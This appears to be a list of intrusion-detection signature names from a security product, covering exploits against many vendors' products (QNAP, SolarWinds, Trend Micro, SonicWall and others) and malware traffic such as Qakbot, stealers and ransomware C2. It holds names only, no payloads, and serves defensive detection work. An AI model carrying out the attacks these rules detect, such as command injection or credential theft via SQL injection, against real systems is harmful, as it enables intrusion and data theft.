HTTP_CRL-Phpwiki-Ploticus-Remote-Code-Execution
HTTP_CRL-Pi-Hole-Blocklist-OS-Command-Execution
HTTP_CRL-Pi-Hole-DHCP-Mac-OS-Command-Execution
HTTP_CRL-Pi-Hole-Whitelist-OS-Command-Execution
HTTP_CRL-PicoFlat-Pagina-Parameter-File-Inclusion
HTTP_CRL-Pihole-Blocklist-Exec-CVE-2020-11108
HTTP_CRL-Pimcore-Gridhelperservice-SQL-Injection
HTTP_CRL-Pimcore-Gridhelperservice.php-Preparelistingforgrid-SQL-Injection
HTTP_CRL-Pimcore-Title-Field-Stored-Cross-Site-Scripting
HTTP_CRL-Pimcore-Unserialize-RCE
HTTP_CRL-Pineapp-Mail-Secure-Conflivelog.pl-Command-Injection
HTTP_CRL-Pineapp-Mail-Secure-Confpremenu.php-Export-Log-Command-Injection
HTTP_CRL-Pineapp-Mail-Secure-Confpremenu.php-Install-License-Command-Injection
HTTP_CRL-Pineapp-Mail-Secure-Livelog-Command-Injection
HTTP_CRL-Pineapp-Mail-Secure-Test_li_connection.php-Command-Injection
HTTP_CRL-Pinkslip-Bot-Traffic
HTTP_CRL-Pinkslipbot-Trojan
HTTP_CRL-Pivotal-Spring-Framework-Iswritableproperty-Spel-Injection
HTTP_CRL-Pivotal-Spring-Security-oauth-SpelView-Code-Execution
HTTP_CRL-Piwigo-CVE-2023-26876-Gather-Credentials-Via-SQL-Injection
HTTP_CRL-PlaySMS-Unauthenticated-Template-Injection-Code-Execution
HTTP_CRL-Plixer-Scrutinizer-Authentication-Bypass
HTTP_CRL-Plusmail-New-Login-Attempt
HTTP_CRL-PmWiki-Remote-PHP-Code-Injection
HTTP_CRL-PolarBear-CMS-PHP-File-Upload
HTTP_CRL-Pontoeb.A-Traffic
HTTP_CRL-Possible-Cross-Site-Scripting-Attempt
HTTP_CRL-Possible-Cross-Site-Scripting-Attempt-2
HTTP_CRL-Possible-Cross-Site-Scripting-With-Body-Onload
HTTP_CRL-Possible-Cross-Site-Scripting-With-JavaScript
HTTP_CRL-Possible-Cross-Site-Scripting-With-Onmouseover
HTTP_CRL-Possible-Evasion-In-SQL-Injection
HTTP_CRL-Possible-Full-Width-And-Half-Width-Unicode-Encoding-Evasion
HTTP_CRL-Possible-LOIC-Request
HTTP_CRL-Possible-Netstat-Command-Usage
HTTP_CRL-Possible-Ping-Command-Usage
HTTP_CRL-Possible-Redirect-Attempt
HTTP_CRL-Possible-Satan-Ransomware-File-Download
HTTP_CRL-Possible-Script-In-Get-Request
HTTP_CRL-Possible-Script-In-Request
HTTP_CRL-Possible-Script-Injection
HTTP_CRL-Possible-SQL-Injection
HTTP_CRL-Possible-SQL-Injection-2
HTTP_CRL-Possible-SQL-Injection-BENCHMARK
HTTP_CRL-Possible-SQL-Injection-InformationSchema
HTTP_CRL-Possible-SQL-Injection-INTO-OUTFILE
HTTP_CRL-Possible-SQL-Injection-LoadFile
HTTP_CRL-Possible-SQL-Injection-PgSleep
HTTP_CRL-Possible-SQL-Injection-WAITFOR-DELAY
HTTP_CRL-Possible-SQL-Version-Query
HTTP_CRL-Possible-W2B-Banking-SQL-Injection
HTTP_CRL-Potential-Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-45195
HTTP_CRL-Progress-Flowmon-Command-Injection-CVE-2024-2389
HTTP_CRL-Progress-Kemp-Loadmaster-Addselectedrs-And-Addselectedvs-Command-Injection
HTTP_CRL-Progress-Kemp-Loadmaster-Logging-Command-Injection-CVE-2024-56131
HTTP_CRL-Progress-Kemp-Loadmaster-Mangle-Stack-Based-Buffer-Overflow-CVE-2025-1758
HTTP_CRL-Progress-Kemp-Loadmaster-Read_Pass-Command-Injection
HTTP_CRL-Progress-Kemp-Loadmaster-Rest-API-Command-Injection
HTTP_CRL-Progress-MOVEit-Authentication-Bypass-CVE-2024-5806
HTTP_CRL-Progress-MOVEit-Externaltokenauthenticator-Denial-Of-Service
HTTP_CRL-Progress-WhatsUp-Gold-GetSqlWhereClause-SQL-Injection-CVE-2024-46906
HTTP_CRL-Progress-WhatsUp-Gold-SQL-Injection-CVE-2024-6670
HTTP_CRL-Progress-WhatsUp-Gold-Testcontroller-Chart-Denial-Of-Service-Vulnerability
HTTP_CRL-Project-GLPI-Htmlawedtest-Code-Injection
HTTP_CRL-ProjectSend-Improper-Authentication-CVE-2024-11680
HTTP_CRL-PRTG-Network-Monitor-Authenticated-RCE-CVE-2018-9276
HTTP_CRL-Psyme.Gen-Traffic
HTTP_CRL-Pulse-Connect-Secure-Template-Injection
HTTP_CRL-Pulse-Secure-Diag.cgi-Command-Injection
HTTP_CRL-Pulse-Secure-SSL-VPN-Stack-Buffer-Overflow
HTTP_CRL-Qakbot-Botnet-Traffic-2
HTTP_CRL-Qakbot-Botnet-Traffic-3
HTTP_CRL-QNAP-Hbs-3-Hybrid-Backup-Sync-Command-Injection
HTTP_CRL-QNAP-Multiple-Products-Hls_Tmp-Directory-Traversal
HTTP_CRL-QNAP-Multiple-Products-Log-Upload-Command-Injection
HTTP_CRL-QNAP-Multiple-Products-Privwizard-Username-Command-Injection
HTTP_CRL-QNAP-Photo-Station-Externally-Controlled-Reference-To-A-Resource-CVE-2022-27593
HTTP_CRL-QNAP-Photo-Station-Path-Traversal-Vulnerability-CVE-2019-7194
HTTP_CRL-QNAP-Q-Center-Virtual-Appliance-Change_Passwd-Command-Execution
HTTP_CRL-QNAP-Remote-Code-Execution-CVE-2024-27130
HTTP_CRL-QNAP-Viostor-NVR-Command-Injection-CVE-2023-47565
HTTP_CRL-Quest-Kace-Systems-Management-Run_Cross_Report-SQL-Injection
HTTP_CRL-Raccoon-Stealer-Infection-Traffic
HTTP_CRL-Ralio-Remote-File-Include-Input-Validation
HTTP_CRL-Rancher-Server-Docker-Exploit
HTTP_CRL-Ransom.KC-Traffic
HTTP_CRL-RaspAP-Unauthenticated-Command-Injection
HTTP_CRL-Ray-Agent-Job-RCE-CVE-2023-48022
HTTP_CRL-rConfig-Ajaxarchivefiles.php-Command-Injection
HTTP_CRL-rConfig-Ajaxserversettingschk.php-Command-Injection
HTTP_CRL-rConfig-Commands.inc.php-SQL-Injection
HTTP_CRL-rConfig-Compliancepolicies-Snippets.PHP-SQL-Injection
HTTP_CRL-rConfig-Devices.inc.php-SQL-Injection
HTTP_CRL-rConfig-Network-Device-Configuration-Ajaxcomparegetcmddates-SQL-Injection
HTTP_CRL-rConfig-Network-Device-Configuration-Tool-Ajaxaddtemplate.php-Command-Injection
HTTP_CRL-rConfig-Network-Device-Configuration-Tool-Configdevice.php-Cross-Site-Scripting
HTTP_CRL-rConfig-Network-Device-Configuration-Tool-DeviceMgmt-Cross-Site-Scripting
HTTP_CRL-rConfig-Search.crud.php-Command-Injection
HTTP_CRL-Realtek-SDK-formSysCmd-Command-Execution-CVE-2021-35395
HTTP_CRL-Realtek-SDK-formWsc-Command-Injection-CVE-2021-35395
HTTP_CRL-Realtek-SDK-Miniigd-OS-Command-Injection
HTTP_CRL-Realtek-SDK-Stack-Buffer-Overflow-Vulnerabilities-CVE-2021-35395
HTTP_CRL-Redaeefe-Trojan-Infection-Traffic
HTTP_CRL-Rejetto-HTTP-File-Server-(HFS)-Unauthenticated-RCE
HTTP_CRL-Reolink-Testemail-OS-Command-Injection-CVE-2019-11001
HTTP_CRL-Reprise-License-Manager-Diagnostics_doit-Directory-Traversal
HTTP_CRL-Reprise-License-Manager-Edit_lf_Get_Data-Directory-Traversal
HTTP_CRL-Reprise-License-Manager-Edit_lf_Process-Directory-Traversal
HTTP_CRL-Reprise-License-Manager-HTTP-Parameter-Parsing-Stack-Buffer-Overflow
HTTP_CRL-Reprise-License-Manager-Multiple-HTTP-Parameters-Parsing-Buffer-Overflow
HTTP_CRL-Responsive-File-Manager-Ajax_calls.php-Get_File-Directory-Traversal
HTTP_CRL-Responsive-Filemanager-Ajax_calls.php-Zip-Directory-Traversal
HTTP_CRL-RevCode-RAT-C2-Traffic
HTTP_CRL-RIG-EK-Request
HTTP_CRL-Rocket-Chat-Pre-Auth-Blind-NoSQL-Injection
HTTP_CRL-Rocket-Servergraph-Admin-Center-Filerequestor-Del-Directory-Traversal
HTTP_CRL-Rocket-Servergraph-Admin-Center-Filerequestor-Directory-Traversal
HTTP_CRL-Rocket-Servergraph-Admin-Center-Filerequestor-Run-And-Runclear-Vulnerability
HTTP_CRL-Rocket-Servergraph-Admin-Center-Userrequest-And-Tsmrequest-Command-Execution
HTTP_CRL-Rockwell-Automation-Factorytalk-Rnadiagnosticssrv-Insecure-Deserialization
HTTP_CRL-Rockwell-Automation-Thinmanager-Thinserver-API-Directory-Traversal
HTTP_CRL-RodClark-sendform.cgi-Blurb-File-Disclosure
HTTP_CRL-Roundcube-Webmail-Arbitrary-File-Read
HTTP_CRL-Roundcube-Webmail-Archive-IMAP-Command-Injection
HTTP_CRL-Roundcube-Webmail-ECE-Via-Config-Setting-CVE-2020-12641
HTTP_CRL-Roxy-WI-Unauthenticated-Command-Injection-RCE
HTTP_CRL-RSA-Authentication-Agent-For-Web-Redirect-BOF
HTTP_CRL-Ruby-On-Rails-Activestorage-Insecure-Deserialization
HTTP_CRL-Ruby-On-Rails-Dynamic-Render-File-Upload-Remote-Code-Execution
HTTP_CRL-Ruby-On-Rails-Secret_Key_Base-Vulnerability
HTTP_CRL-Ruby-On-Rails-Where-Hash-SQL-Injection
HTTP_CRL-Ruby-Saml-XMLSecurity-DOCTYPE-Authentication-Bypass-CVE-2025-25291
HTTP_CRL-Rudder-Server-SQLi-Remote-Code-Execution
HTTP_CRL-SaltStack-Salt-API-SSH-Client-Command-Injection
HTTP_CRL-SaltStack-Salt-Salt.wheel.pillar_roots.write-Method-Directory-Traversal
HTTP_CRL-Sambar-Server-Search-Results-Buffer-Overflow
HTTP_CRL-Saml-XML-Signature-Wrapping
HTTP_CRL-Samsung-Data-Manager-Hardcoded-Credentials
HTTP_CRL-Samsung-Data-Manager-SQL-Injection
HTTP_CRL-Samsung-Security-Manager-Activemq-Broker-Service-Multiple-Vulnerabilities
HTTP_CRL-SAP-Crystal-Reports-2008-Directory-Traversal
HTTP_CRL-SAP-Db-Web-Server-Buffer-Overflow-Vulnerability
HTTP_CRL-SAP-Internet-Transaction-Server-Wgate-DLL-Cross-Site-Scripting
HTTP_CRL-SAP-Internet-Transaction-Server-Wgate-Information-Disclosure
HTTP_CRL-SAP-Netweaver-As-Java-XML-External-Entity
HTTP_CRL-SAP-Soap-Information-Disclosure
HTTP_CRL-SAP-SQL-Anywhere-.NET-Data-Provider-Column-Alias-Buffer-Overflow
HTTP_CRL-SAP-SQL-Anywhere-.NET-Malformed-Integer-Buffer-Overflow
HTTP_CRL-Sasfis-Bot-Traffic
HTTP_CRL-Satan-Ransomware-C2-Traffic
HTTP_CRL-Scar.O-Traffic
HTTP_CRL-Schneider-Electric-Pelco-Endura-Encoder
HTTP_CRL-Schneider-Electric-Struxureware-Data-Center-Expert-Command-Injection
HTTP_CRL-Schneider-Electric-U.motion-Builder-css.inc.php-Arbitrary-File-Inclusion
HTTP_CRL-Schneider-Electric-U.motion-Builder-loadtemplate.php-SQL-Injection
HTTP_CRL-Schneider-Electric-U.motion-Builder-Localize-SQL-Injection
HTTP_CRL-Schneider-Electric-U.motion-Builder-nfcserver.php-SQL-Injection
HTTP_CRL-Schneider-Electric-U.motion-Builder-runscript.php-Directory-Traversal
HTTP_CRL-Schneider-Electric-U.motion-Builder-Track-SQL-Injection
HTTP_CRL-School-Management-Pro-Wordpress-Plugin-Backdoor-CVE-2022-1609
HTTP_CRL-Script-In-Get-Request
HTTP_CRL-Script-In-Request
HTTP_CRL-Script-In-URL-Parameters
HTTP_CRL-Serendipity-FrontPage-SQL-Injection
HTTP_CRL-ServHelper-Malware-Infection-Traffic
HTTP_CRL-Serviio-Media-Server-checkStreamUrl-Command-Execution
HTTP_CRL-Sgi-Cgi-Infosearch-Fname-Usage
HTTP_CRL-ShadowPad-C2-Traffic
HTTP_CRL-Shared-Variables
HTTP_CRL-Sharepoint-NTLM-Relay-Improper-Input-Validation-CVE-2023-24950
HTTP_CRL-Sharepoint-Server-Access-Control-Exploit
HTTP_CRL-SharePoint-Workflows-XOML-Injection-CVE-2020-0646
HTTP_CRL-SHeur4.BHUE-Traffic
HTTP_CRL-Shopware-Gettemplatename-Local-File-Inclusion
HTTP_CRL-Siemens-Sinec-NMS-CVE-2021-33733-SQL-Injection
HTTP_CRL-Siemens-Sinec-NMS-CVE-2021-37200-Directory-Traversal
HTTP_CRL-Siemens-Sinec-NMS-Export-Firmware-Container-Directory-Traversal
HTTP_CRL-Sierra-Wireless-ALEOS-Acemanager-Cross-Site-Scripting-CVE-2023-40461
HTTP_CRL-Sierra-Wireless-ALEOS-Acemanager-Denial-Of-Service-CVE-2023-40459
HTTP_CRL-Simda.bqz-Traffic
HTTP_CRL-SimpleBBS-Name-Argument-Remote-Code-Execution
HTTP_CRL-SimplestGuest-Command-Execution
HTTP_CRL-Siretta-Quartz-Gold-Router-OS-Command-Injection
HTTP_CRL-Siretta-Quartz-Gold-Router-Stack-Buffer-Overflow
HTTP_CRL-Sitecom-Home-Storage-Center-Directory-Traversal
HTTP_CRL-Skyworth-GPON-HomeGateways-And-Optical-Network-Terminals-Stack-Overflow
HTTP_CRL-Smart-Software-Solutions-Codesys-Controlservice-Stack-Buffer-Overflow
HTTP_CRL-Smartstore-Smartstorenet-Forumpost-Stored-Cross-Site-Scripting
HTTP_CRL-Smartstore-Smartstorenet-Privatemessages-Stored-Cross-Site-Scripting
HTTP_CRL-Smarty-Template-Engine-Sandbox-Escape-CVE-2021-26119
HTTP_CRL-Smoaler.B-Traffic
HTTP_CRL-Smoaler.C-Traffic
HTTP_CRL-SMSreg-Traffic
HTTP_CRL-Solarview-Compact-Command-Injection-CVE-2022-29303
HTTP_CRL-Solarview-Compact-Command-Injection-CVE-2023-23333
HTTP_CRL-Solarwinds-Network-Configuration-Manager-Arbitrary-File-Write
HTTP_CRL-Solarwinds-Network-Performance-Monitor-Fromjson-Insecure-Deserialization
HTTP_CRL-Solarwinds-Network-Performance-Monitor-Updateactionsdescriptions-SQL-Injection
HTTP_CRL-Solarwinds-NPM-DeserializeFromStrippedXml-Insecure-Deserialization
HTTP_CRL-Solarwinds-Orion-Ipam-Reflected-Cross-Site-Scripting
HTTP_CRL-Solarwinds-Orion-Patch-Manager-Edittopxx-Insecure-Deserialization
HTTP_CRL-Solarwinds-Orion-Patch-Manager-Wsasyncexecutetasks.aspx-Insecure-Deserialization
HTTP_CRL-Solarwinds-Serv-U-FTP-Server-User_Full_Name-Stored-Cross-Site-Scripting
HTTP_CRL-Solarwinds-Srm-Profiler-Backupassociationservlet-Add-SQL-Injection
HTTP_CRL-Solarwinds-Srm-Profiler-Backupexceptionsservlet-SQL-Injection
HTTP_CRL-Solarwinds-Srm-Profiler-Bexdriveusagesummaryservlet-SQL-Injection
HTTP_CRL-Solarwinds-Srm-Profiler-Duplicatefilesservlet-SQL-Injection
HTTP_CRL-Solarwinds-Srm-Profiler-Fileactionassignmentservlet-Assignednames-SQL-Injection
HTTP_CRL-Solarwinds-Srm-Profiler-Hoststorageservlet-State-Filesystem-Id-SQL-Injection
HTTP_CRL-Solarwinds-Srm-Profiler-Nbuerrormessageservlet-Exitcode-SQL-Injection
HTTP_CRL-Solarwinds-Srm-Profiler-Rulesmetadata-Addnewrule-SQL-Injection
HTTP_CRL-Solarwinds-Srm-Profiler-Scriptservlet-Scriptschedule-SQL-Injection
HTTP_CRL-Solarwinds-Srm-Profiler-Scriptservlet-State-SQL-Injection
HTTP_CRL-Solarwinds-Srm-Profiler-Userdefinedfieldconfigservlet-Saveudf-SQL-Injection
HTTP_CRL-Solarwinds-Srm-Profiler-Windowseventlogsservlet-SQL-Injection
HTTP_CRL-Solarwinds-Srm-Profiler-Xiotechmonitorservlet-Savesite-SQL-Injection
HTTP_CRL-Solarwinds-Web-Help-Desk-Ajaxproxy-Insecure-Deserialization
HTTP_CRL-SolusLabs-SolusVM-Centralbackup-SQL-Injection
HTTP_CRL-Sonatype-Nexus-Repository-Manager-Contentselectorsapiresource-Stored-Cross-Site-Scripting
HTTP_CRL-Sonatype-Nexus-Repository-Manager-CVE-2019-7238-Expression-Language-Injection
HTTP_CRL-SonicWall-Command-Injection-CVE-2021-20039
HTTP_CRL-SonicWall-Gms-And-Analytics-Detectinjection-Security-Filter-Bypass
HTTP_CRL-SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
HTTP_CRL-SonicWall-Gms-And-Analytics-Performdownloadtask-Directory-Traversal
HTTP_CRL-SonicWall-Multiple-Products-Authentication-Bypass
HTTP_CRL-SonicWall-SMA100-SQL-Injection
HTTP_CRL-Sophos-Firewall-Authentication-Bypass-CVE-2022-1040
HTTP_CRL-Sophos-Web-Appliance-Change_password-Admin-Password-Privilege-Escalation
HTTP_CRL-Sophos-Web-Appliance-Command-Injection-CVE-2023-1671
HTTP_CRL-Sophos-Web-Appliance-Sophosconfig-Write-Command-Execution
HTTP_CRL-Sophos-XG-Firewall-Pre-Auth-SQL-Injection
HTTP_CRL-SpamTitan-Unauthenticated-RCE
HTTP_CRL-SPIP-Form-PHP-Injection
HTTP_CRL-Splunk-Edit_User-Capability-Privilege-Escalation
HTTP_CRL-Splunk-Enterprise-Alerts_Id-Server-Side-Request-Forgery
HTTP_CRL-Splunk-Enterprise-Data-Model-Stored-Cross-Site-Scripting
HTTP_CRL-Splunk-Enterprise-Module_Resolver-Directory-Traversal
HTTP_CRL-Splunk-Enterprise-Radio-Reflected-Cross-Site-Scripting
HTTP_CRL-Splunk-Enterprise-Splunk-App-For-Lookup-File-Editing-Directory-Traversal
HTTP_CRL-Splunk-Search-Remote-Code-Execution
HTTP_CRL-Spring-Core-Remote-Code-Execution
HTTP_CRL-Spring-Core-Remote-Code-Execution-Suspicious-Parameter-Name
HTTP_CRL-SProtector.A-Traffic
HTTP_CRL-SQL-Drop-Table
HTTP_CRL-SQL-Union-Select
HTTP_CRL-Sqlninja-Attack-Tool-Usage
HTTP_CRL-Stagil-Navigation-For-JIRA-Path-Traversal-Vulnerabilities
HTTP_CRL-Stalkerlab-Mailers-CGIMail-Access
HTTP_CRL-Stealc-Stealer-Infection-Traffic
HTTP_CRL-Stealer.a-Traffic
HTTP_CRL-Studio-42-elFinder-Elfindervolumedriver-Command-Injection
HTTP_CRL-Studio-42-elFinder-Getfullpath-Directory-Traversal
HTTP_CRL-Subdreamer-Light-Global-Variables-SQL-Injection
HTTP_CRL-SugarCRM-Rest_Data-PHP-Object-Deserialization
HTTP_CRL-Sumavision-EMR-Arbitrary-User-Creation-CVE-2020-10181
HTTP_CRL-SunBurst-SUPERNOVA-Traffic-Detected-1
HTTP_CRL-Sunhillo-Sureline-Command-Injection-CVE-2021-36380
HTTP_CRL-Supermicro-Onboard-IPMI-Close-Window-Cgi-Buffer-Overflow
HTTP_CRL-Supermicro-Onboard-IPMI-login.cgi-Multiple-Buffer-Overflows
HTTP_CRL-Supermicro-Onboard-IPMI-logout.cgi-Buffer-Overflow
HTTP_CRL-Supermicro-Onboard-IPMI-url_redirect.cgi-Directory-Traversal
HTTP_CRL-Supervisor-XML-RPC-Authenticated-Remote-Code-Execution
HTTP_CRL-Suprema-Biostar-2-SQL-Injection-CVE-2023-27167
HTTP_CRL-Suspected-APT-Traffic-Pattern
HTTP_CRL-Suspected-LOIC-Request
HTTP_CRL-Suspicious-Parameter-Value
HTTP_CRL-Symantec-Encryption-Management-Server-Database-Backup-Command-Injection
HTTP_CRL-Symantec-Endpoint-Protection-Consoleservlet-Resetpassword-Policy-Bypass
HTTP_CRL-Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting
HTTP_CRL-Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting-CVE-2016-3652
HTTP_CRL-Symantec-IM-Manager-Administrator-Console-Code-Injection
HTTP_CRL-Symantec-IM-Manager-Administrator-Interface-SQL-Injection
HTTP_CRL-Symantec-IM-Manager-IMAdminReportTrendFormRun.asp-SQL-Injection
HTTP_CRL-Symantec-IM-Manager-IMAdminScheduleReport.asp-SQL-Injection
HTTP_CRL-Symantec-IM-Manager-LoggedInUsers.lgx-Definition-File-SQL-Injections
HTTP_CRL-Symantec-IM-Manager-rdpageimlogic.aspx-SQL-Injections
HTTP_CRL-Symantec-Liveupdate-Administrator-Security-Bypass
HTTP_CRL-Symantec-Messaging-Gateway-Directory-Traversal
HTTP_CRL-Symantec-Messaging-Gateway-Performrestore-Command-Injection
HTTP_CRL-Symantec-Messaging-Gateway-Remote-Code-Execution
HTTP_CRL-Symantec-Scan-Engine-Authentication-Bypass
HTTP_CRL-Symantec-Sygate-Management-Server-Authentication-Servlet-SQL-Injection
HTTP_CRL-Symantec-Web-Gateway-Dbutils.php-SQL-Injection
HTTP_CRL-Symantec-Web-Gateway-Multiple-Php-Pages-Cross-Site-Scripting
HTTP_CRL-Symantec-Web-Gateway-OS-Command-Injection
HTTP_CRL-Symantec-Web-Gateway-Pbcontrol.php-Command-Injection
HTTP_CRL-Symantec-Web-Gateway-Timer.php-Multiple-XSS-Vulnerabilities
HTTP_CRL-Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution
HTTP_CRL-Syncovery-For-Linux-Web-GUI-Authenticated-RCE
HTTP_CRL-Synology-DiskStation-Manager-smart.cgi-RCE
HTTP_CRL-Synology-Safeaccess-SQL-Injection
HTTP_CRL-Sysax-Multi-Server-Stack-Based-Buffer-Overflow
HTTP_CRL-TA551-Shathak-Malware-Infection-Traffic
HTTP_CRL-Teltonika-RUT9XX-Router-OS-Command-Injection-CVE-2018-17532
HTTP_CRL-Tenda-AC11-Remote-Code-Execution-CVE-2021-31755
HTTP_CRL-Tenda-AC15-AC1900-Remote-Code-Execution-CVE-2020-10987
HTTP_CRL-Tenda-AC18-Remote-Code-Execution-CVE-2022-31446
HTTP_CRL-Tenda-ONT-GPON-AC1200-HG9-Command-Injection-CVE-2022-30023
HTTP_CRL-TerraMaster-TOS-ajaxdata.php-Multiple-Command-Injections
HTTP_CRL-TerraMaster-TOS-Unauthenticated-RCE-CVE-2022-24989
HTTP_CRL-TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45837
HTTP_CRL-TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45841
HTTP_CRL-Test-Cgi-Directory-Disclosure
HTTP_CRL-TheftSpy.C-Traffic
HTTP_CRL-ThinkPHP-RCE-Vulnerability-CVE-2018-20062
HTTP_CRL-Tiki-Wiki-PHP-Code-Execution
HTTP_CRL-TikiWiki-Admin-Authentication-Bypass-CVE-2020-15906
HTTP_CRL-TikiWiki-Tiki-Graph-Formula-Command-Execution
HTTP_CRL-Tobfy-Traffic
HTTP_CRL-Too-Many-Parameters-In-GET-Request
HTTP_CRL-Torpplar.A-Traffic
HTTP_CRL-Total-JS-CMS-12-Widget-JavaScript-Code-Injection
HTTP_CRL-Totolink-N600R-exportOvpn-Command-Injection-CVE-2022-26186
HTTP_CRL-Totolink-Wireless-Routers-Unauthenticated-RCE-Vulnerability
HTTP_CRL-TP-Link-Archer-AX21-Command-Injection-CVE-2023-1389
HTTP_CRL-TP-Link-Cloud-Cameras-NCXXX-Bonjour-Command-Injection
HTTP_CRL-TP-Link-Tapo-C200-IP-Camera-Command-Injection-CVE-2021-4045
HTTP_CRL-TP-Link-TLWR840N-Command-Injection-CVE-2022-25060
HTTP_CRL-TP-Link-WR940N-Stack-Buffer-Overflow
HTTP_CRL-TrackerCam-Server-Php-Script-Argument-BOF
HTTP_CRL-Trend-Micro-Apex-One-And-OfficeScan-CVE-2020-8470-Directory-Traversal
HTTP_CRL-Trend-Micro-Control-Manager-Ad-Hoc-Query-Module-SQL-Injection
HTTP_CRL-Trend-Micro-Control-Manager-Adhocquery_Processor-Getproductcategory-SQL-Injection
HTTP_CRL-Trend-Micro-Control-Manager-Adhocquery_Processor.aspx-SQL-Injection
HTTP_CRL-Trend-Micro-Control-Manager-DLP_policy.php-Directory-Traversal
HTTP_CRL-Trend-Micro-Control-Manager-Lang-Parameter-Arbitrary-File-Inclusion
HTTP_CRL-Trend-Micro-Control-Manager-Scloudservice-Getpassword-SQL-Injection
HTTP_CRL-Trend-Micro-Control-Manager-Task_Controller-Information-Disclosure
HTTP_CRL-Trend-Micro-Control-Manager-Widget-Importfile.php-Directory-Traversal
HTTP_CRL-Trend-Micro-InterScan-Messaging-Policywsaction-External-Entity-Injection
HTTP_CRL-Trend-Micro-InterScan-Messaging-Security-Modtmcss-Command-Injection
HTTP_CRL-Trend-Micro-InterScan-Messaging-Security-Remote-Code-Execution
HTTP_CRL-Trend-Micro-InterScan-Web-Security-Virtual-Appliance-Decryptpasswd-Buffer-Overflow
HTTP_CRL-Trend-Micro-InterScan-Web-Security-Virtual-Appliance-Password-Command-Injection
HTTP_CRL-Trend-Micro-Iwsva-Deploymentwizardaction-Getclusterinfo-Command-Injection
HTTP_CRL-Trend-Micro-Iwsva-Domains-Command-Injection
HTTP_CRL-Trend-Micro-Iwsva-HttpServlet-Command-Injection
HTTP_CRL-Trend-Micro-Iwsva-Mailnotification-Buffer-Overflow
HTTP_CRL-Trend-Micro-Iwsva-Managevlansettings-Command-Injections
HTTP_CRL-Trend-Micro-Iwsva-Pacfilemanagement-Delete_Pac_Files-Command-Injection
HTTP_CRL-Trend-Micro-Iwsva-TestConfiguration-Command-Injection
HTTP_CRL-Trend-Micro-Iwsva-VerboseLog-Directory-Traversal
HTTP_CRL-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Unregister-Slink_Id-SQL-Injection
HTTP_CRL-Trend-Micro-Mobile-Security-Enterprise-Get_dep_Profile-Id-SQL-Injection
HTTP_CRL-Trend-Micro-Mobile-Security-Web_Service-Path-Traversal
HTTP_CRL-Trend-Micro-OfficeScan-Cgi-Password-Decryption-Buffer-Overflow
HTTP_CRL-Trend-Micro-OfficeScan-Proxy.php-Command-Injection
HTTP_CRL-Trend-Micro-OfficeScan-Server-cgiRecvFile-Buffer-Overflow
HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Dead_Local_Device-Command-Injection
HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Devicetool-Devid-Command-Injection
HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_Device_Info-SQL-Injection
HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_nic_Device-SQL-Injection
HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Restartservice-Command-Injection
HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Rollback-Command-Injection
HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Storage-Discovery_iSCSI_Device-Command-Injection
HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Storage.pm-Device_Id-Role-Command-Injection
HTTP_CRL-Trend-Micro-Smart-Protection-Server-Admin_notification.php-Command-Injection
HTTP_CRL-Trend-Micro-Smart-Protection-Server-ccca_ajaxhandler.php-Remote-Code-Execution
HTTP_CRL-Trend-Micro-Smart-Protection-Server-Wcs_Bwlists_Handler-Command-Injection
HTTP_CRL-Trend-Micro-Virtual-Mobile-Infrastructure-DoS
HTTP_CRL-Trixbox-Directory-Traversal
HTTP_CRL-Trojan-Ad-Clicker-Activity-Detected
HTTP_CRL-Trojan-Downloader-MSIL-OnyxDropper-A
HTTP_CRL-Trojan-FakeAV-Checkin
HTTP_CRL-Trojan-FakeAV-File-Download
HTTP_CRL-Trojan-Shell-Retemuja-A
HTTP_CRL-TrueOnline-Billion-5200W-T-Router-Command-Injection
HTTP_CRL-TrueOnline-ZyXEL-P660HN-T-V1-Router-ViewLog.asp-Command-Injection
HTTP_CRL-TrueOnline-ZyXEL-P660HN-T-V2-Router-logSet.asp-Command-Injection
HTTP_CRL-TWiki-And-Foswiki-MAKETEXT-Remote-Command-Execution
HTTP_CRL-TWiki-Configure-Script-TYPEOF-Parameter-Perl-Code-Execution
HTTP_CRL-TWiki-Remote-Perl-Code-Execution
HTTP_CRL-TWiki-Rev-Parameter-Command-Execution
HTTP_CRL-TWiki-Search-Function-Command-Execution-Vulnerability
HTTP_CRL-Twister-IP-Update
HTTP_CRL-Twister-Search
HTTP_CRL-Twitter-TwitterServer-Histogramqueryhandler-Cross-Site-Scripting
HTTP_CRL-TYPO3-CMS-Phar-Insecure-Deserialization
HTTP_CRL-TYPO3-CMS-Sanitizelocalurl-Cross-Site-Scripting
HTTP_CRL-TYPO3-Lux-Extension-SQL-Injection
HTTP_CRL-Ultra-Mini-Httpd-Stack-Based-Buffer-Overflow
HTTP_CRL-Unauthenticated-RCE-In-Bricks-Builder-Theme
HTTP_CRL-Unauthenticated-Remote-Code-Execution-In-Ignition
HTTP_CRL-Unitrends-UEB-api/storage-Remote-Root
HTTP_CRL-Unix-IFS-Code-Execution
HTTP_CRL-Unraid-Auth-Bypass-PHP-RCE
HTTP_CRL-Untangle-NG-Firewall-execEvil-Command-Injection
HTTP_CRL-URI-Directory-Traversal-2
HTTP_CRL-Vandyke-Vshell-Server-Trigger-Command-Injection
HTTP_CRL-VBulletin-Forum-Calendar-SQL-Injection
HTTP_CRL-VBulletin-Impex-Systempath-Code-Execution
HTTP_CRL-VBulletin-nodeid-SQL-Injection
HTTP_CRL-VBulletin-nodeid-SQL-Injection-CVE-2020-12720
HTTP_CRL-VBulletin-Remote-Code-Execution-5.6.x
HTTP_CRL-VBulletin-widgetConfig-RCE
HTTP_CRL-Vcenter-Server-Arbitrary-File-Upload-CVE-2021-22005
HTTP_CRL-Vcenter-Server-VSAN-Health-Check-RCE-CVE-2021-21985
